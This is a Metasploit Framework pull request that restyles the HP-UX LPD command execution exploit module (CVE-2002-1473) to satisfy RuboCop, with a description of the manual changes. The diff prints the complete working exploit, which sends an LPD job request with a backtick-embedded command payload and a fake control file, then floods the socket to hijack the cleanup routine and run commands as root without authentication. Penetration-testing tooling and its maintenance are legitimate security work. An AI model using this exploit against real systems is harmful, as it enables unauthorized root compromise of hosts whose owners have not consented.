### PR TITLE
modules/exploits/hpux: Resolve RuboCop violations

### DIFF
--- a/modules/exploits/hpux/lpd/cleanup_exec.rb
+++ b/modules/exploits/hpux/lpd/cleanup_exec.rb
@@ -3,95 +3,96 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+require 'English'
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::Tcp
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'HP-UX LPD Command Execution',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'HP-UX LPD Command Execution',
+        'Description' => %q{
           This exploit abuses an unpublished vulnerability in the
-        HP-UX LPD service. This flaw allows an unauthenticated
-        attacker to execute arbitrary commands with the privileges
-        of the root user. The LPD service is only exploitable when
-        the address of the attacking system can be resolved by the
-        target. This vulnerability was silently patched with the
-        buffer overflow flaws addressed in HP Security Bulletin
-        HPSBUX0208-213.
-      },
-      'Author'         => [ 'hdm' ],
-      'References'     =>
-        [
-          [ 'CVE', '2002-1473'],
-          [ 'OSVDB', '9638'],
-          [ 'URL', 'http://archives.neohapsis.com/archives/hp/2002-q3/0064.html'],
-
-        ],
-      'Platform'       => %w{ hpux unix },
-      'Arch'           => ARCH_CMD,
-      'Payload'        =>
-        {
-          'Space'       => 200,
-          'DisableNops' => true,
-          'BadChars'    => "\x00\x09\x20\x2f",
-          'Compat'      =>
-            {
-              'PayloadType' => 'cmd',
-              'RequiredCmd' => 'generic perl telnet',
-            }
+          HP-UX LPD service. This flaw allows an unauthenticated
+          attacker to execute arbitrary commands with the privileges
+          of the root user. The LPD service is only exploitable when
+          the address of the attacking system can be resolved by the
+          target. This vulnerability was silently patched with the
+          buffer overflow flaws addressed in HP Security Bulletin
+          HPSBUX0208-213.
         },
-      'Targets'        =>
-        [
-          [ 'Automatic Target', { }]
+        'Author' => [ 'hdm' ],
+        'References' => [
+          ['CVE', '2002-1473'],
+          ['OSVDB', '9638'],
+          ['URL', 'https://web.archive.org/web/20041213153521/http://archives.neohapsis.com/archives/hp/2002-q3/0064.html'],
         ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2002-08-28'
-    ))
+        'Platform' => %w[hpux unix],
+        'Arch' => ARCH_CMD,
+        'Payload' => {
+          'Space' => 200,
+          'DisableNops' => true,
+          'BadChars' => "\x00\x09\x20\x2f",
+          'Compat' => {
+            'PayloadType' => 'cmd',
+            'RequiredCmd' => 'generic perl telnet'
+          }
+        },
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'Privileged' => true,
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2002-08-28',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
 
-    register_options(
-      [
-        Opt::RPORT(515)
-      ])
+    register_options([
+      Opt::RPORT(515)
+    ])
   end
 
   def exploit
-
     # The job ID is squashed down to three decimal digits
-    jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]
+    jid = ($PROCESS_ID % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]
 
     # Connect to the LPD service
     connect
 
-    print_status("Sending our job request with embedded command string...")
+    print_status('Sending our job request with embedded command string...')
+
     # Send the job request with the encoded command
-    sock.put(
-      "\x02" + rand_text_alphanumeric(3) + jid +
-      "`" + payload.encoded + "`\n"
-    )
+    sock.put("\x02#{rand_text_alphanumeric(3)}#{jid}`#{payload.encoded}`\n")
 
     res = sock.get_once(1)
-    if !(res and res[0,1] == "\x00")
-      print_status("The target did not accept our job request")
-      return
+    if !(res && res[0, 1] == "\x00")
+      fail_with(Failure::Unknown, 'The target did not accept our job request')
     end
 
-    print_status("Sending our fake control file...")
-    sock.put("\x02 32 cfA" + rand_text_alphanumeric(8) + "\n")
+    print_status('Sending our fake control file...')
+    sock.put("\x02 32 cfA#{rand_text_alphanumeric(8)}\n")
+
     res = sock.get_once(1)
-    if !(res and res[0,1] == "\x00")
-      print_status("The target did not accept our control file")
-      return
+    if !(res && res[0, 1] == "\x00")
+      fail_with(Failure::Unknown, 'The target did not accept our control file')
     end
 
-    print_status("Forcing an error and hijacking the cleanup routine...")
+    print_status('Forcing an error and hijacking the cleanup routine...')
 
     begin
       sock.put(rand_text_alphanumeric(16384))
-      disconnect
-    rescue
+    rescue StandardError
+      # request may fail, this is expected
     end
-
+  ensure
+    disconnect unless sock.nil?
   end
 end


### PR DESCRIPTION
Most violations were resolved with `rubocop -A`, except notes.

Framework has only one HPUX module: `modules/exploits/hpux/lpd/cleanup_exec.rb`. Several changes were applied to this module manually:

* Adds `'Privileged' => true` as the module description states the commands are executed as `root`.
* The module uses an unusual technique to generate a random hex number based on the concatenation of the modulus of the Metasploit process ID and the system date. The preceding code comment offers little insight ("The job ID is squashed down to three decimal digits") as the generated number is much longer than 3 digits when generated on 32-bit and 64-bit systems. I've left the code as is (apart from the RuboCop recommended change of using `$PROCESS_ID` rather than `$$` which introduces `English` as a library dependency).
* The module greedily rescues everything. I presume this is because sending to the socket is expected to fail given that we are "forcing an error". I've added a code comment to indicate that failure is expected.
* The `disconnect` was moved into an `ensure` clause.
* Update reference URL.
* Replace `print_*(msg); return` code pattern with `fail_with(Failure::Unknown, msg)`.
* The module has `ExcellentRanking` rank, so is presumed to be `CRASH_SAFE`.
